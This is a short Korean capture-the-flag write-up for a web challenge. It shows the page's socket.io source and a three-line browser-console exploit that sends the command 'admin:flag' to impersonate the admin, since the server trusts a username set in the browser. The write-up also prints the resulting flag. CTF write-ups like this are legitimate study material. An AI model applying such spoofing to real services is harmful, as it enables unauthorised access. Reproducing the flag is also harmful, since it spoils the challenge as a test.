old-58 (150)

첫 화면이다.

페이지 소스는 아래와 같다.

<!doctype html>
<html>
  <head>
    <title>USER Console</title>
    <style>
      * { margin: 0; padding: 0; box-sizing: border-box; }
      body { font: 13px Helvetica, Arial; }
      form { background: #000; padding: 3px; position: fixed; bottom: 0; width: 100%; }
      form input { border: 0; padding: 10px; width: 90%; margin-right: .5%; }
      form button { width: 9%; background: rgb(130, 224, 255); border: none; padding: 10px; }
      #messages { list-style-type: none; margin: 0; padding: 0; }
      #messages li { padding: 5px 10px; }
      #messages li:nth-child(odd) { background: #eee; }
    </style>
  </head>
  <body>
    <ul id="messages"></ul>
    <form action="">
      <input id="m" autocomplete="off" /><button>Send</button>
    </form>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/2.2.0/socket.io.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <script>
    $(function () {
      var username = "guest";
      var socket = io();
      $('form').submit(function(e){
        e.preventDefault();
        socket.emit('cmd',username+":"+$('#m').val());
        $('#m').val('');
        return false;
      });
      socket.on('cmd', function(msg){
        $('#messages').append($('<li>').text(msg));
      });
    });
    </script>
  </body>
</html>

폼에 각각 ls, flag를 넣고 제출한 결과가 아래와 같다.

크롬 개발자도구 콘솔에 아래와 같이 입력한다.

var socket = io();
socket.emit('cmd', 'admin:flag');
socket.on('cmd', function(msg) {console.log(msg);});

실행 결과, 플래그가 출력된다.

플래그는 FLAG{do_you_know_about_darkhotel}이다.

Auth 창에 플래그를 넣고 제출하면 문제가 풀린다.